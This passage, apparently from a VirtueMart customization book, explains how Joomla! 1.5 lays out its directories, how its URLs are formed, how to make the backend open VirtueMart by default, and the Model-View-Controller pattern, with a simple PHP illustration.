Let's move back to the root directory and take a look at the last important directory mentioned above. The administrator directory mimics the root directory in many respects. We see that most of the subdirectories we found in the root have a corresponding subdirectory within the administrator directory. For example, we find subdirectories named components and modules within administrator as well.

As we know, there are two main sections of a Joomla! website, known as the frontend and the backend. The root directory and the administrator directory are, respectively, where the frontend and backend files are located. While this dividing line is not rigid, we can use it as a guide when we want to locate a frontend or backend file. Since both the root and the administrator directories contain a subdirectory called components, to avoid ambiguity we will refer to them as the root components and administrator components directories, respectively.
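To keep our bearings, here is a sketch of the directories we have met so far (only the ones we will reference are shown; the real tree is, of course, far larger):

joomla-root/
    index.php              <- main entry point to the frontend
    administrator/         <- backend files
        index.php          <- main entry point to the backend
        components/        <- the "administrator components" directory
        modules/
    components/            <- the "root components" directory
        com_content/
            controller.php
            models/
            views/
    modules/
    plugins/               <- subdirectories arranged by plugin type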
Now, let's work our way a little bit down the directory tree to see how VirtueMart fits into this framework. Within the root components directory, you will see a subdirectory called com_virtuemart. Yes, this is where all the files used by VirtueMart for the frontend can be found. Under the com_virtuemart directory, among some other files and subdirectories, you will notice a themes subdirectory. You will find each of the VirtueMart themes you have installed there. The themes directory is the major work area. From now on, we will refer to the com_virtuemart directory under the root components directory as the root VirtueMart directory or the frontend VirtueMart directory.

Within the administrator components directory, there is also a subdirectory called com_virtuemart, where the backend VirtueMart files are located. Under this main directory, there are four subdirectories named classes, html, languages, and sql. Obviously, these directories contain, respectively, the class files, HTML files, language files, and SQL (that is, database) files. Actually, the classes and html directories have a deeper meaning than their names suggest, as we shall see in a moment.

Structure of the Joomla! URL path
Before leaving our high-level exploration of the Joomla! tree structure, let's digress a little bit to study how a Joomla! URL is built up. While the Joomla! directory structure is complicated, the URL used to access the site is much simpler. Most of the time, the URL just starts with index.php?. (If you have a Search Engine Friendly, or SEF, system enabled, you should turn it off during the development and testing of your customization, or at least turn it off mentally while we are talking about the URL. You can turn off SEF in the Joomla! Configuration page.) For example, if we want to access the VirtueMart (frontend) home page, we can use the following URL:

http://your_joomla_live_site/index.php?option=com_virtuemart

Similarly, the URL

http://your_joomla_live_site/administrator/index.php?option=com_virtuemart

will bring up the VirtueMart backend control panel, if you're already logged in. All other Joomla! URLs, in fact, work in the same way, although many times you will see some additional parameters as well. (Don't forget to replace your_joomla_live_site in the above URLs with your domain name and the Joomla! root directory, in case the site is not installed in the root.)

Actually, the index.php script is the main entry into your Joomla! site. All major requests to the frontend start from here (major requests only, since there are other entry points as well, but they need not concern us at this point). Similarly, all major requests to the backend start from the file administrator/index.php. Restricting the entry point to the site makes it very easy to control authorized and unauthorized access. For example, if we want to put the site offline, we can simply change a configuration setting in Joomla! and all components will be offline as well. We don't need to change each page, or even each component, one by one.

Understanding the structure of the Joomla! URL is pretty useful during the development and debugging process. Sometimes we may need to work on a partly live site in which the Joomla! site is already working, but the VirtueMart shop is still under construction. In such cases, it is common to unpublish the menu items for the shop so that the shop stays hidden from the public. The fact that the menu item is hidden actually means the shop is less accessible, but not inaccessible.
If we want to test the VirtueMart shop, we can still type the URL into the browser ourselves. Using the URL

http://your_joomla_live_site/index.php?option=com_virtuemart

we can bring up the VirtueMart home page. We will learn some more tricks for testing individual shop pages along the way in our study of VirtueMart themes and templates.

One simple application of what we have learned about the URL arises when customizing Joomla!. When working on VirtueMart projects, we will need to go to the VirtueMart backend from time to time to modify the VirtueMart settings. As we all know, after logging in, what we have on the browser window is the control panel page. We need to point to the components/virtuemart menu before we can open the VirtueMart backend home page. This is not a complicated task, but it becomes very tedious when repeated every time we log back into the site. Can we make Joomla! smarter, so that it opens the VirtueMart home page by default when we log on? Yes, we can. The trick relates to what we have talked about so far. If you want to customize Joomla! to open the VirtueMart backend by default, stay with me for the following warm-up exercise. (I understand some of you may not want to change the default login page.)

Exercise 1.1: Making the Joomla! backend default to VirtueMart
1. Open your favorite text editor.
2. Navigate to the Joomla! site root.
3. Open the file administrator/includes/helper.php.
4. At around line 44 (the actual line may vary from version to version), change the code $option = 'com_cpanel'; to $option = 'com_virtuemart';
5. Save the file.
6. Open your browser and log in to your Joomla! site.

Voilà! You should see the VirtueMart control panel instead of the Joomla! control panel.

This simple exercise demonstrates that a useful change does not always need complex coding. What we need is a little knowledge of how things work. I bet you can probably understand what we have done above without explanation. After login, Joomla! automatically goes to the default component, hardcoded in the file helper.php. For standard Joomla!, this is the com_cpanel component. In Exercise 1.1, we changed this default backend component from com_cpanel to com_virtuemart. Instead of VirtueMart, we can certainly change the default to other components, such as Community Builder or MOSET.

Joomla! 1.5 presentation framework
Since VirtueMart is a Joomla! component, it cannot exist outside Joomla!. So before diving into the details of the VirtueMart engine, it pays to take a brief look at how Joomla! actually works. While an understanding of the presentation framework of Joomla! and VirtueMart may be useful for themes and templates development, it is not essential for the actual customization design.

Joomla! emerged from version 1.0 and later developed into 1.5. In this upgrade, Joomla! was basically rewritten from the ground up. A presentation structure called Model-View-Controller, or MVC, has been adopted in Joomla! 1.5. While a detailed explanation of the MVC structure is out of our scope, a basic understanding of how it works will help us understand why and how VirtueMart 1.1 behaves the way it does.

Joomla! is a web application. Each page Joomla! produces is in fact a text document consisting of HTML code. Depending on the parameters of a web request, Joomla! generates a dynamic HTML page by combining data stored in the database with site configuration data stored in various PHP files.
In the early history of dynamic web pages, program code was written with HTML tags mixed into the presentation logic in one place. This spaghetti code, as it is sometimes called, makes maintenance and extension of the code very difficult. As the basic structure of a dynamic web page became better understood, more and more coding patterns emerged to make the life of a web developer easier. The MVC presentation framework is one of the patterns that have been proposed for building computer applications. It has gradually become the standard pattern for building web applications and has been adopted by many open source web projects.

Models
In the MVC presentation framework, the job of building a web page is divided into three main tiers. The backend tier is the data that is stored in the database (strictly speaking, there is no prescribed data storage format, though a database is a natural way to manage the data). We need to grab the data needed to build the web page. This tier of the job is done by the Model, which describes how data is stored and how it can be retrieved from the data server.

Views
The frontend tier determines what data is presented in the browser, and how. This is the job of the View. For a given dataset from a Model, there can be many different ways to present the data. Say we have a set of statistical data, for example. We can present this data as a bar graph or a pie chart. Each of these presentations is called a View of the same Model.

Controllers
Now, statistical data is just a set of numbers. How can we convert it into a bar graph or a pie chart? That is exactly where the Controller comes in. A Controller is a routine specifying how to convert the Model into various Views. One major advantage of this separation of data (Model) and presentation (View) is that it makes changes to the application much easier. We can change the presentation independently of the underlying data, and vice versa.

So, in the Joomla! 1.5 world, we have a set of Models which interface with the database, a set of Views which tell the browser how to present the data, and a set of Controllers which control how to convert the Models into the Views. According to best practice, all Joomla! 1.5 components should follow this same structure. Thus, each Joomla! 1.5 component should have two subdirectories called models and views, and the component's root directory should contain a controller.php which extends the Joomla! controller's capability. This is exactly the structure we saw earlier when we looked at the contents of the com_content component. However, for historical and other reasons, not all components follow this best practice. VirtueMart is one of those exceptions.
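To make the three tiers concrete, here is a deliberately simplified, framework-free PHP sketch of the pattern. This is not the actual Joomla! 1.5 API; the class and method names are invented purely for illustration:

<?php
// Model: knows how to fetch the data, nothing about presentation
class ArticleModel {
    public function getArticle($id) {
        // a real Model would query the database; a record is hardcoded here
        return array('id' => $id, 'title' => 'Hello', 'body' => 'Some content');
    }
}

// View: knows how to render a dataset, nothing about where it came from
class ArticleHtmlView {
    public function display($article) {
        echo '<h1>' . htmlspecialchars($article['title']) . '</h1>';
        echo '<p>' . htmlspecialchars($article['body']) . '</p>';
    }
}

// Controller: picks a Model and a View and wires them together
class ArticleController {
    public function show($id) {
        $model = new ArticleModel();
        $view  = new ArticleHtmlView();
        $view->display($model->getArticle($id));
    }
}

// index.php, the single entry point, dispatches to the controller
$controller = new ArticleController();
$controller->show(1);

Swapping ArticleHtmlView for, say, an ArticleJsonView would change the presentation without touching the Model, which is precisely the advantage described above.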